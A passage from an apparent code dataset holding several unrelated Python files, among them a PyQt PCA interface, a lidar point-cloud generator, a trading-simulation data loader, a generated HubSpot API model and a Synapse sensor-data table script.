self.table.setGeometry(QtCore.QRect(0, 0, 800, 600-self.fileToolBar.geometry().height()-self.menubar.geometry().height()))\n self.table.setModel(data)\n self.table.setVisible(True)\n self.action_save_file.setEnabled(True)\n self.action_PCA_midpoint.setEnabled(True)\n self.action_PCA_vertex.setEnabled(True)\n # если всё успешно - сохраняем набор точек(элементов)\n self.elements = elements\n\n @QtCore.pyqtSlot()\n def runPCA(self, method):\n \"\"\"\n Слот вызова МГК\n \"\"\"\n if method == pca.PCA_MIDPOINT and len(self.elements) < self.elements[0].dimensions_count:\n QtGui.QMessageBox.warning(self, 'Ошибка!', 'Число измерений > числа элеметнов', self.yes)\n pca.choice_PCA(self.elements, method) # вызываем МГК\n # переписываем данные в таблице\n if method == pca.PCA_MIDPOINT:\n self.set_table_model([el.pca_mid for el in self.elements], [el.header for el in self.elements], Element.get_fracs(PCA_MIDPOINT))\n elif method == pca.PCA_VERTEX:\n self.set_table_model([el.pca_ver for el in self.elements], [el.header for el in self.elements], Element.get_fracs(PCA_VERTEX))\n self.method = method\n # кнопки визуализации\n if self.elements[0].dimensions_count > 1:\n self.action_draw_2D.setEnabled(True)\n if self.elements[0].dimensions_count > 2:\n self.action_draw_3D.setEnabled(True)\n\n @QtCore.pyqtSlot()\n def drawing(self, dimension):\n \"\"\"\n Отрисовываем (точки или интервалы).\n :param dimension: рисовать двух- или трёхмерную картину\n :param regime: рисуем данные по интервалам или точкам\n \"\"\"\n draw(self.elements, dimension, self.method)\n\n def set_table_model(self, data, vertical_header = '', horizontal_header = ''):\n \"\"\"\n Записываем данные в модель таблицы\n :param data: данные для записи. Должны иметьы (coordinates, dimensions_count) - возвращаеющий их координаты\n :param vertical_header: список вертикальных заголовков\n :param horizontal_header: список горизонтальных заголовков\n :return: QtGui.QStandardItemModel\n \"\"\"\n model = self.table.model() # получаем модель таблицы\n if not model: # если ещё ничего нет - создаём\n model = QtGui.QStandardItemModel(len(data), len(data[0]))\n # заполняем\n for row, shape in enumerate(data):\n for col, dimension in enumerate(shape):\n item = QtGui.QStandardItem(str(dimension))\n model.setItem(row, col, item)\n # задаём заголовки\n if vertical_header == '':\n vertical_header = ['Точка %i' %(i + 1) for i in range(len(data))]\n if horizontal_header == '':\n horizontal_header = ['Измерение %i' %(i + 1) for i in range(len(data[0]))]\n model.setVerticalHeaderLabels(vertical_header)\n model.setHorizontalHeaderLabels(horizontal_header)\n return model\n\n def set_language(self, new_lang):\n '''\n Присваиваем названия элементам интерфейса на выбранном языке\n '''\n self.config.lang = new_lang\n self.action_open_file.setText(self.t('open_file'))\n self.action_save_file.setText(self.t('save_file'))\n self.action_exit.setText(self.t('exit'))\n self.action_Qt.setText(self.t('about_Qt'))\n self.action_PCA_midpoint.setText(self.t('PCA_mid'))\n self.action_PCA_vertex.setText(self.t('PCA_vert'))\n self.action_draw_2D.setText(self.t('2d'))\n self.action_draw_3D.setText(self.t('3d'))\n self.actionAboutPCA.setText(self.t('about_PCA'))\n self.actionClaster.setText(self.t('claster'))\n self.menu.setTitle(self.t('file'))\n self.menu_2.setTitle(self.t('settings'))\n self.menu_3.setTitle(self.t('help'))\n self.menu_4.setTitle(self.t('lang'))\n self.menu_5.setTitle(self.t('data_handl'))\n self.menu_6.setTitle(self.t('visual'))\n self.menu_8.setTitle(self.t('PCA'))\n\n def t(self, key):\n return self.config.t[key]","sub_path":"SAID/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330275237","text":"from shapely.ops import linemerge\n\nfrom features.feature import Feature\n\n\ndef merge_features(features):\n \"\"\" Merge feature geometries together where possible, forming several\n contiguous MultiLineStrings. Applies data of first feature to all.\n\n Arguments:\n features {list} -- list of Features\n \"\"\"\n merged_features = []\n merged_geoms = linemerge([f.geom for f in features])\n\n if merged_geoms.geom_type == 'MultiLineString':\n merged_geoms = merged_geoms.geoms\n else:\n merged_geoms = [merged_geoms]\n\n for mg in merged_geoms:\n merged_features.append(Feature(mg, features[0].data))\n\n return merged_features\n","sub_path":"geometry/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445838158","text":"import copy\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nimport uncertainties\nimport time\nfrom uncertainties import umath\nfrom uncertainties import unumpy as unp\n\nfrom utilities import SYSTEM_STATES, Subscribable, Subscriber, UpdateSignal\n\nSTEPS_PER_ROTATION = 3200\nLIDAR_UNCERT = 0.05\n\n\nclass PointCloudGenerator(Subscribable, Subscriber):\n def __init__(self, point_cloud_file_name):\n super().__init__()\n\n self.point_cloud_file_name = point_cloud_file_name\n self.target_measurements = defaultdict(lambda: defaultdict(tuple))\n self.scan_measurements = defaultdict(list)\n self.my_locations = defaultdict(tuple)\n self.target_locations = defaultdict(lambda: defaultdict(tuple))\n self.scan_locations = defaultdict(list)\n self.iteration = None\n self.last_save = time.time()\n\n def signal(self, signal: UpdateSignal, data=None):\n if signal == UpdateSignal.NEW_DATA:\n self.handle_new_data(data)\n return super().signal(signal, data=data)\n\n def handle_new_data(self, data):\n system_state = data[0]\n if system_state == SYSTEM_STATES.LOCALIZE:\n state_iteration = data[1]\n self.iteration = state_iteration\n target_id = data[2]\n self.target_measurements[state_iteration][target_id] = tuple(data[3:])\n return\n if system_state == SYSTEM_STATES.SCAN:\n state_iteration = data[1]\n self.iteration = state_iteration\n measurement = tuple(data[2:])\n self.scan_measurements[state_iteration].append(measurement)\n self.scan_locations[state_iteration].append(\n self.measurement_to_location(measurement)\n )\n if time.time() - self.last_save > 1:\n self.save_scan()\n self.last_save = time.time()\n\n self.signal_subscribers(UpdateSignal.NEW_DATA)\n\n def measurement_to_location(self, measurement):\n R = self.generate_rotation_matrix()\n relative_location = np.matmul(R, measurement_to_xyz(measurement))\n inertial_location = self.my_locations[self.iteration] + relative_location\n return inertial_location\n\n def generate_rotation_matrix(self):\n # TODO: handle multiple targets\n targets = self.target_measurements[self.iteration]\n t1 = targets[1]\n t2 = targets[2]\n p1 = measurement_to_xyz(t1)\n p2 = measurement_to_xyz(t2)\n xax = np.reshape(unp.uarray([1, 0, 0], [0.0, 0.0, 0.0]), (3,))\n p2p1 = p2 - p1\n print(\"Target delta:\", p2p1)\n R = rotation_matrix_from(p2p1, xax)\n self.my_locations[self.iteration] = np.matmul(R, -p1.copy())\n return R\n\n def save_scan(self):\n locs = []\n for iteration in self.scan_locations.keys():\n locs += self.scan_locations[iteration]\n print(len(locs))\n locs = np.array(locs)\n locs = np.squeeze(locs, axis=(1,))\n locs = unp.nominal_values(locs)\n np.save(self.point_cloud_file_name, locs)\n\n\ndef unorm(v):\n return (v[0] ** 2 + v[1] ** 2 + v[2] ** 2) ** 0.5\n\n\ndef rotation_matrix_from(A, B):\n A = A / unorm(A)\n B = B / unorm(B)\n\n v = np.cross(A, B)\n s = unorm(v)\n c = np.dot(A, B)\n\n ssm = np.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])\n\n R = np.eye(3) + ssm + np.matmul(ssm, ssm) / (1 + c)\n R = unp.matrix(R)\n return R\n\n\ndef measurement_to_xyz(measurement):\n theta_step, phi_step, dist = measurement\n dist = uncertainties.ufloat(dist, LIDAR_UNCERT)\n theta_step = uncertainties.ufloat(theta_step, 0.05)\n phi_step = uncertainties.ufloat(phi_step, 0.05)\n return np.array(\n [\n dist\n * umath.cos(theta_step * 360 / STEPS_PER_ROTATION * np.pi / 180)\n * umath.cos(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n dist\n * umath.sin(theta_step * 360 / STEPS_PER_ROTATION * np.pi / 180)\n * umath.cos(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n dist * umath.sin(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n ]\n )\n\n\nif __name__ == \"__main__\":\n gen = PointCloudGenerator(\"temp\")\n t1 = (\"LOCALIZE\", 1, 1, 0, 0, 0)\n t2 = (\"LOCALIZE\", 1, 2, 10, 0, 0)\n\n (gen.signal(UpdateSignal.NEW_DATA, t1))\n (gen.signal(UpdateSignal.NEW_DATA, t2))\n p1 = (\"SCAN\", 1, 5, 0, 50)\n (gen.signal(UpdateSignal.NEW_DATA, p1))\n (gen.signal(UpdateSignal.NEW_DATA, p1))\n\n (gen.target_measurements)\n (gen.scan_measurements)\n (gen.my_locations[1])\n locs = gen.scan_locations[1]\n locs = np.array(locs)\n locs = np.squeeze(locs, axis=(1,))\n locs = unp.nominal_values(locs)","sub_path":"point_cloud_generator.py","file_name":"point_cloud_generator.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9362561","text":"# Script for reading data from random traders\r\n\r\n# Import libs\r\n# Import `AmmEnginePyTools` from custom dir\r\nimport importlib.machinery\r\n\r\nloader = importlib.machinery.SourceFileLoader('OrderBooks', '../../../AmmEnginePyTools/OrderBooks.py')\r\nOrderBooks = loader.load_module()\r\n\r\nimport pandas as pd\r\n\r\n\r\n# Define Classs\r\nclass AnalysisSimulation():\r\n\r\n def __init__(self, instrument, exchange, file_path, number_sims=1, offset=0):\r\n self.Instrument = instrument\r\n self.Exchange = exchange\r\n self.Number_Of_Simulations = number_sims\r\n self.Sim_Numbering_Offset = offset\r\n self.File_Path = file_path\r\n\r\n def gen_file_list(self, name):\r\n return [self.Instrument + \"_\" + self.Exchange + \"@%i_\" % i + name for i in\r\n range(self.Sim_Numbering_Offset, self.Number_Of_Simulations)]\r\n\r\n\r\ndef GenerateAgentNames(number_of_markets: int, number_of_agents: int, agent_name_prefix: str) -> list:\r\n ''' Function for generateing a list of agent names based on an agent name prefix string and the number of sims and\r\n the number of agents in each sim'''\r\n AgentNames: list = [] # %Make List of agent names\r\n for i in range(number_of_markets):\r\n AgentNames.append([agent_name_prefix + \"-%i-%i\" % (i, j) for j in range(1, number_of_agents)])\r\n return AgentNames\r\n\r\n\r\ndef Prepare_SimOrderBook(SimOrderBooks):\r\n for SimOrderBook in SimOrderBooks:\r\n SimOrderBook.OrderBook[\"DateTime\"] = pd.to_datetime(SimOrderBook.OrderBook[\"Nanos\"],\r\n utc=True).dt.tz_convert(\r\n \"America/New_York\") # Make a datetime column and specify that nanos are in utc and convert to localtime ie NY time\r\n SimOrderBook.OrderBook = SimOrderBook.OrderBook[\r\n SimOrderBook.OrderBook[\"DateTime\"].dt.weekday < 5] # Skip Weekends\r\n\r\ndef Prepare_TradesLogs(TradesLogs):\r\n for TradeLog in TradesLogs:\r\n TradeLog[\"DateTime\"] = pd.to_datetime(TradeLog[\"Nanos\"],\r\n utc=True).dt.tz_convert(\r\n \"America/New_York\") # Make a datetime column and specify that nanos are in utc and convert to localtime ie NY time\r\n TradeLog = TradeLog[\r\n TradeLog[\"DateTime\"].dt.weekday < 5] # Skip Weekends\r\n\r\n\r\nfrom multiprocessing import Pool, cpu_count\r\ndef GetData(path):\r\n #if __name__ == \"__main__\":\r\n # Class for keeping track of files\r\n SPYFiles = AnalysisSimulation(instrument=\"SPY\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0\r\n )\r\n\r\n # Generate lists of files for use in analysis\r\n SPYFiles.SimOBList = SPYFiles.gen_file_list(\"Matching-OrderBook.csv\")\r\n SPYFiles.AgentLogList = SPYFiles.gen_file_list(\"Matching-agents.csv\")\r\n # SPYFiles.MMLogList = SPYFiles.gen_file_list(\"Matching-OpenOrders.csv\")\r\n\r\n USDFiles = AnalysisSimulation(instrument=\"USD\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0\r\n )\r\n USDFiles.InventoryLogList = USDFiles.gen_file_list(\"Historical-inventory.csv\") # Random trader logs\r\n\r\n TradesFiles = AnalysisSimulation(instrument=\"SPY\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0)\r\n TradesFiles.TradesLogList = TradesFiles.gen_file_list(\"Matching-MarketOrders.csv\")\r\n\r\n with Pool(cpu_count()) as p:\r\n # Read simulation order book\r\n SimOrderBooks = p.map(OrderBooks.AmmEngineOrderBook_Wrapper,\r\n [{\"order_book_file_path\": SPYFiles.File_Path + LogName,\r\n \"order_book_file_type\": \"Amm engine order book file\",\r\n \"order_book_depth\": 10} for LogName in SPYFiles.SimOBList]\r\n )\r\n # Read agent order book\r\n AgentLogs = p.map(OrderBooks.AgentsLog_Wrapper, [{\"log_file_path\": SPYFiles.File_Path + AgentLogName,\r\n \"agent_log_file_type\": \"Amm engine agents log file\"} for\r\n AgentLogName in SPYFiles.AgentLogList]\r\n )\r\n\r\n # Read Market Maker order book. commented\r\n # AgentsOrderBook_ColumnNames = [\"AgentName\",\r\n # \"Nanos\",\r\n # \"DateTime\",\r\n # \"AgentBestBidQty\",\r\n # \"AgentBestBid\",\r\n # \"AgentBestAsk\",\r\n # \"AgentBestAskQty\",\r\n # \"scale\"]\r\n\r\n # MMLogs = p.map(OrderBooks.AmmEngineAgentOrderBook_Wrapper,\r\n # [{\"agent_name\": \"InvMM-%i-0\" % (i + SPYFiles.Sim_Numbering_Offset),\r\n # \"order_book_file_path\": SPYFiles.File_Path + MMLogName,\r\n # \"order_book_file_type\": \"Inventory market maker 2 order book log\",\r\n # \"order_book_depth\": 2,\r\n # \"column_names\": AgentsOrderBook_ColumnNames} for i, MMLogName in\r\n # enumerate(SPYFiles.MMLogList)]\r\n #\r\n # )\r\n\r\n # Read random trades cash inventory\r\n\r\n InventoryLogList_ColumnNames = [\"AgentName\",\r\n \"Nanos\",\r\n \"DateTime\",\r\n \"Cash\"]\r\n\r\n # InventoryLogList_ColumnTypes = {\"AgentName\": str,\"Nanos\": str, \"DateTime\": str, \"Cash\": str}\r\n RT_CashInventory = p.map(OrderBooks.Read_CSV_Wrapper, [{\"filepath_or_buffer\": SPYFiles.File_Path + LogName,\r\n \"index_col\": False,\r\n \"names\": InventoryLogList_ColumnNames,\r\n \"header\": 1} for LogName in USDFiles.InventoryLogList]\r\n )\r\n TradesLogList_ColumnNames = [\"Nanos\",\r\n \"DateTime\",\r\n \"Agent\",\r\n \"Action\",\r\n \"Inst\",\r\n \"Side\",\r\n \"OrderQty\",\r\n \"OrderPrice\",\r\n \"FilledQty\",\r\n \"AvgPrice\",\r\n \"TimeInForce\",\r\n \"OrderID\",\r\n \"Method\",\r\n \"Param\"]\r\n\r\n TradesLogs = p.map(OrderBooks.Read_CSV_Wrapper,[{\"filepath_or_buffer\": TradesFiles.File_Path + LogName,\r\n \"index_col\": False,\r\n \"names\": TradesLogList_ColumnNames,\r\n \"header\": 1} for LogName in TradesFiles.TradesLogList]\r\n )\r\n Prepare_SimOrderBook(SimOrderBooks)\r\n return SimOrderBooks, AgentLogs, RT_CashInventory, TradesLogs\r\n if __name__ != \"__main__\":\r\n print(\"Not in __main__\")\r\n\r\n","sub_path":"Toymarket1/LoadRandomTradersToymarketData.py","file_name":"LoadRandomTradersToymarketData.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603351413","text":"# coding: utf-8\n\n\"\"\"\n Calling Extensions API\n\n Provides a way for apps to add custom calling options to a contact record. This works in conjunction with the [Calling SDK](#), which is used to build your phone/calling UI. The endpoints here allow your service to appear as an option to HubSpot users when they access the *Call* action on a contact record. Once accessed, your custom phone/calling UI will be displayed in an iframe at the specified URL with the specified dimensions on that record. # noqa: E501\n\n The version of the OpenAPI document: v3\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\ntry:\n from inspect import getfullargspec\nexcept ImportError:\n from inspect import getargspec as getfullargspec\nimport pprint\nimport re # noqa: F401\nimport six\n\nfrom hubspot.crm.extensions.calling.configuration import Configuration\n\n\nclass SettingsResponse(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\"name\": \"str\", \"url\": \"str\", \"height\": \"int\", \"width\": \"int\", \"is_ready\": \"bool\", \"supports_custom_objects\": \"bool\", \"created_at\": \"datetime\", \"updated_at\": \"datetime\"}\n\n attribute_map = {\n \"name\": \"name\",\n \"url\": \"url\",\n \"height\": \"height\",\n \"width\": \"width\",\n \"is_ready\": \"isReady\",\n \"supports_custom_objects\": \"supportsCustomObjects\",\n \"created_at\": \"createdAt\",\n \"updated_at\": \"updatedAt\",\n }\n\n def __init__(self, name=None, url=None, height=None, width=None, is_ready=None, supports_custom_objects=None, created_at=None, updated_at=None, local_vars_configuration=None): # noqa: E501\n \"\"\"SettingsResponse - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration.get_default_copy()\n self.local_vars_configuration = local_vars_configuration\n\n self._name = None\n self._url = None\n self._height = None\n self._width = None\n self._is_ready = None\n self._supports_custom_objects = None\n self._created_at = None\n self._updated_at = None\n self.discriminator = None\n\n self.name = name\n self.url = url\n self.height = height\n self.width = width\n self.is_ready = is_ready\n self.supports_custom_objects = supports_custom_objects\n self.created_at = created_at\n self.updated_at = updated_at\n\n @property\n def name(self):\n \"\"\"Gets the name of this SettingsResponse. # noqa: E501\n\n The name of your calling service to display to users. # noqa: E501\n\n :return: The name of this SettingsResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this SettingsResponse.\n\n The name of your calling service to display to users. # noqa: E501\n\n :param name: The name of this SettingsResponse. # noqa: E501\n :type name: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501\n raise ValueError(\"Invalid value for `name`, must not be `None`\") # noqa: E501\n\n self._name = name\n\n @property\n def url(self):\n \"\"\"Gets the url of this SettingsResponse. # noqa: E501\n\n The URL to your phone/calling UI, built with the [Calling SDK](#). # noqa: E501\n\n :return: The url of this SettingsResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\"Sets the url of this SettingsResponse.\n\n The URL to your phone/calling UI, built with the [Calling SDK](#). # noqa: E501\n\n :param url: The url of this SettingsResponse. # noqa: E501\n :type url: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and url is None: # noqa: E501\n raise ValueError(\"Invalid value for `url`, must not be `None`\") # noqa: E501\n\n self._url = url\n\n @property\n def height(self):\n \"\"\"Gets the height of this SettingsResponse. # noqa: E501\n\n The target height of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :return: The height of this SettingsResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this SettingsResponse.\n\n The target height of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :param height: The height of this SettingsResponse. # noqa: E501\n :type height: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and height is None: # noqa: E501\n raise ValueError(\"Invalid value for `height`, must not be `None`\") # noqa: E501\n\n self._height = height\n\n @property\n def width(self):\n \"\"\"Gets the width of this SettingsResponse. # noqa: E501\n\n The target width of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :return: The width of this SettingsResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._width\n\n @width.setter\n def width(self, width):\n \"\"\"Sets the width of this SettingsResponse.\n\n The target width of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :param width: The width of this SettingsResponse. # noqa: E501\n :type width: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and width is None: # noqa: E501\n raise ValueError(\"Invalid value for `width`, must not be `None`\") # noqa: E501\n\n self._width = width\n\n @property\n def is_ready(self):\n \"\"\"Gets the is_ready of this SettingsResponse. # noqa: E501\n\n When true, your service will appear as an option under the *Call* action in contact records of connected accounts. # noqa: E501\n\n :return: The is_ready of this SettingsResponse. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._is_ready\n\n @is_ready.setter\n def is_ready(self, is_ready):\n \"\"\"Sets the is_ready of this SettingsResponse.\n\n When true, your service will appear as an option under the *Call* action in contact records of connected accounts. # noqa: E501\n\n :param is_ready: The is_ready of this SettingsResponse. # noqa: E501\n :type is_ready: bool\n \"\"\"\n if self.local_vars_configuration.client_side_validation and is_ready is None: # noqa: E501\n raise ValueError(\"Invalid value for `is_ready`, must not be `None`\") # noqa: E501\n\n self._is_ready = is_ready\n\n @property\n def supports_custom_objects(self):\n \"\"\"Gets the supports_custom_objects of this SettingsResponse. # noqa: E501\n\n When true, you are indicating that your service is compatible with engagement v2 service and can be used with custom objects. # noqa: E501\n\n :return: The supports_custom_objects of this SettingsResponse. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._supports_custom_objects\n\n @supports_custom_objects.setter\n def supports_custom_objects(self, supports_custom_objects):\n \"\"\"Sets the supports_custom_objects of this SettingsResponse.\n\n When true, you are indicating that your service is compatible with engagement v2 service and can be used with custom objects. # noqa: E501\n\n :param supports_custom_objects: The supports_custom_objects of this SettingsResponse. # noqa: E501\n :type supports_custom_objects: bool\n \"\"\"\n if self.local_vars_configuration.client_side_validation and supports_custom_objects is None: # noqa: E501\n raise ValueError(\"Invalid value for `supports_custom_objects`, must not be `None`\") # noqa: E501\n\n self._supports_custom_objects = supports_custom_objects\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this SettingsResponse. # noqa: E501\n\n When this calling extension was created. # noqa: E501\n\n :return: The created_at of this SettingsResponse. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this SettingsResponse.\n\n When this calling extension was created. # noqa: E501\n\n :param created_at: The created_at of this SettingsResponse. # noqa: E501\n :type created_at: datetime\n \"\"\"\n if self.local_vars_configuration.client_side_validation and created_at is None: # noqa: E501\n raise ValueError(\"Invalid value for `created_at`, must not be `None`\") # noqa: E501\n\n self._created_at = created_at\n\n @property\n def updated_at(self):\n \"\"\"Gets the updated_at of this SettingsResponse. # noqa: E501\n\n The last time the settings for this calling extension were modified. # noqa: E501\n\n :return: The updated_at of this SettingsResponse. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._updated_at\n\n @updated_at.setter\n def updated_at(self, updated_at):\n \"\"\"Sets the updated_at of this SettingsResponse.\n\n The last time the settings for this calling extension were modified. # noqa: E501\n\n :param updated_at: The updated_at of this SettingsResponse. # noqa: E501\n :type updated_at: datetime\n \"\"\"\n if self.local_vars_configuration.client_side_validation and updated_at is None: # noqa: E501\n raise ValueError(\"Invalid value for `updated_at`, must not be `None`\") # noqa: E501\n\n self._updated_at = updated_at\n\n def to_dict(self, serialize=False):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n def convert(x):\n if hasattr(x, \"to_dict\"):\n args = getfullargspec(x.to_dict).args\n if len(args) == 1:\n return x.to_dict()\n else:\n return x.to_dict(serialize)\n else:\n return x\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n attr = self.attribute_map.get(attr, attr) if serialize else attr\n if isinstance(value, list):\n result[attr] = list(map(lambda x: convert(x), value))\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], convert(item[1])), value.items()))\n else:\n result[attr] = convert(value)\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, SettingsResponse):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, SettingsResponse):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"hubspot/crm/extensions/calling/models/settings_response.py","file_name":"settings_response.py","file_ext":"py","file_size_in_byte":11681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298529690","text":"'''\nStores three tables to Synapse (under `TABLE_OUTPUT`):\n\nMC10 Sensor Measurements\n columns task_id, sensor_location, mc10_accelerometer, mc10_gyroscope, mc10_emg\nSmartwatch Sensor Measurements\n columns task_id, smartwatch_accelerometer\nMotor Task Timestamps and Scores\n columns task_id, subject_id, visit, task, task_code, start_utc, stop_utc,\n tremor_left, tremor_right, bradykinesia_left, bradykinesia_right,\n dyskinesia_left, dyskinesia_right, overall, validated, side\n'''\n\nimport os\nimport uuid\nimport argparse\nimport tempfile\nimport multiprocessing\nimport synapseclient as sc\nimport synapseutils as su\nimport pandas as pd\n\nTESTING = False\nSCORES = \"syn18435302\"\nMC10_MEASUREMENTS = \"syn18822536\" if TESTING else \"syn18435632\"\nSMARTWATCH_MEASUREMENTS = \"syn18822537\" if TESTING else \"syn18435623\"\nSMARTWATCH_SENSOR_NAME = \"smartwatch\"\nMC10_SENSOR_NAME = \"mc10\"\nFRAC_TO_STORE = 0.02 if TESTING else 1\nTABLE_OUTPUT = \"syn11611056\" if TESTING else \"syn18407520\"\nTASK_CODE_MAP = { # synchronize with MJFF Levodopa release\n \"Drnkg\": \"drnkg\",\n \"Drwg\": \"drwg\",\n \"Fldg\": \"fldng\",\n \"FtnL\": \"ftnl\",\n \"FtnR\": \"ftnr\",\n \"NtsBts\": \"ntblt\",\n \"RamL\": \"raml\",\n \"RamR\": \"ramr\",\n \"Sheets\": \"orgpa\",\n \"Sitng\": \"sittg\",\n \"SitStand\": \"ststd\",\n \"Stndg\": \"stndg\",\n \"Typg\": \"typng\",\n \"Wlkg\": \"wlkgs\",\n \"WlkgCnt\": \"wlkgc\"}\nSCORES_COL_MAP = {\n \"SubjID\": \"subject_id\",\n \"Visit\": \"visit\",\n \"Task\": \"task\",\n \"TaskAbb\": \"task_code\",\n \"Start Timestamp (UTC)\": \"start_utc\",\n \"Stop Timestamp (UTC)\": \"stop_utc\",\n \"Tremor - Left\": \"tremor_left\",\n \"Tremor - Right\": \"tremor_right\",\n \"Bradykinesia - Left\": \"bradykinesia_left\",\n \"Bradykinesia - Right\": \"bradykinesia_right\",\n \"Dyskinesia - Left\": \"dyskinesia_left\",\n \"Dyskinesia - Right\": \"dyskinesia_right\",\n \"Overall\": \"overall\",\n \"Validated\": \"validated\",\n \"Side\": \"smartwatch_side\"}\n\n\ndef read_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--download-in-parallel\", action=\"store_const\",\n const=True, default = False)\n parser.add_argument(\"--upload-in-parallel\", action=\"store_const\",\n const=True, default = False)\n args = parser.parse_args()\n return(args)\n\n\ndef read_syn_table(syn, synapse_id, q = \"select * from {}\"):\n q = syn.tableQuery(q.format(synapse_id))\n df = q.asDataFrame()\n return df\n\n\ndef parse_info_from_filename(fname, sensor):\n if sensor == SMARTWATCH_SENSOR_NAME:\n _, subject_id, year_month = os.path.splitext(fname)[0].split(\"_\")\n year, month = tuple(map(int, year_month.split(\"-\")))\n elif sensor == MC10_SENSOR_NAME:\n subject_id = int(os.path.splitext(fname)[0].split(\"_\")[1])\n year, month = None, None\n else:\n raise TypeError(\"sensor must be one of {} or {}\".format(\n SMARTWATCH_SENSOR_NAME, MC10_SENSOR_NAME))\n return subject_id, year, month\n\n\ndef find_relevant_scores(fname, scores, sensor):\n def is_match(t, year, month, f_subject_id, score_subject_id):\n if int(f_subject_id) == int(score_subject_id):\n if year is None or month is None:\n return True\n elif isinstance(year, int) and isinstance(month, int):\n return year == t.year and month == t.month\n else:\n raise TypeError(\"Year and month must both be integers.\")\n else:\n return False\n subject_id, year, month = parse_info_from_filename(fname, sensor)\n relevent_scores = scores.apply(\n lambda s : is_match(s.start_utc, year, month, subject_id, s.subject_id),\n axis = 1)\n return scores[relevent_scores]\n\n\ndef new_data_column(syn, scores, col, parent, filtering_prefix, sensor,\n download_in_parallel):\n relevant_entities = download_relevant_children(\n syn, parent, filtering_prefix, scores, sensor, download_in_parallel)\n all_sliced_measurements = pd.DataFrame()\n for syn_id in relevant_entities:\n f, task_ids = (relevant_entities[syn_id][\"synapse_file\"],\n relevant_entities[syn_id][\"task_ids\"])\n sliced_measurements = slice_sensor_measurement(f, scores, task_ids, sensor)\n sliced_measurements = sliced_measurements.rename(\n {\"sensor_data\": col}, axis = 1)\n relevant_entities[syn_id][\"data\"] = sliced_measurements\n if len(relevant_entities):\n all_sliced_measurements = pd.concat(\n [relevant_entities[syn_id][\"data\"] for syn_id in relevant_entities],\n axis=0)\n return(all_sliced_measurements)\n\n\ndef download_relevant_children(syn, parent, filtering_prefix, scores, sensor,\n download_in_parallel=False):\n \"\"\"\n Returns\n -------\n dict with key synapse_id (str) and values synapse_file (File), task_ids (list)\n \"\"\"\n _, _, entity_info = list(su.walk(syn, parent))[0]\n entity_info = [(i, j) for i, j in entity_info if i.startswith(filtering_prefix)]\n relevant_entities = {}\n for fname, syn_id in entity_info:\n relevant_scores = find_relevant_scores(fname, scores, sensor)\n if len(relevant_scores):\n relevant_entities[syn_id] = {\"synapse_file\": None,\n \"task_ids\": relevant_scores.task_id}\n ordered_synapse_ids = list(relevant_entities.keys())\n if download_in_parallel:\n mp = multiprocessing.dummy.Pool(4)\n children = mp.map(syn.get, ordered_synapse_ids)\n else:\n children = list(map(syn.get, ordered_synapse_ids))\n for syn_id, f in zip(ordered_synapse_ids, children):\n 